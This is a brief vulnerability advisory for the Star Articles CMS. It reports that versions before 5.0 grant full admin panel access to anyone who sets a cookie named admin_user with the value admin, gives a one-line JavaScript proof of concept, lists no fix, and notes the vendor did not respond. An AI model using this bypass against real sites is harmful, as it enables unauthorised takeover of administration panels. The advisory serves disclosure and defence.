Star Articles
   Insecure Cookie Handling
  ===========================




 SUMMARY
 ________

 Ready to use article, news, joke, tutorial site script with
 more features  than  you can think of . . .  Manage a large
 collection of articles, jokes , tutorials and anything else
 for  your  niche  and  get  features  like  automatic   RSS 
 generation , easy  contents  syndication ,  automated  link 
 exchange and everything else (Including inbuilt 13 POWERFUL 
 SEO TOOLS)that MAKES YOUR LIFE EASY. 


 IMPACT
 _______

 Leads to full administration rights on the CMS admin panel. 



 VERSIONS
 _________

 Vulnerable systems: Versions prior to 5.0

 Immune systems: None
 
 
 
 DESCRIPTION #1
 ______________
 
 Insecure cookie handling allows anyone to simply create a custom cookie
 with the values below.  This will allow full access to the admin panel. 

 Name      - admin_user
 Content   - admin
 Path      - /


 Proof of Concept:
   -> javascript:document.cookie="admin_user=admin; path=/"

 Fix: 
   -> None given. 
    
    

 ADDITIONAL INFO
 _______________
 
 
 Vendor URL         - www.stararticles.com
 Underlying OS      - Linux (Any), UNIX (Any), Windows (Any)
 Credit             - Jay Scott <jay@jayscott.co.uk
 Message History    - No response from vendor after
                      30 days.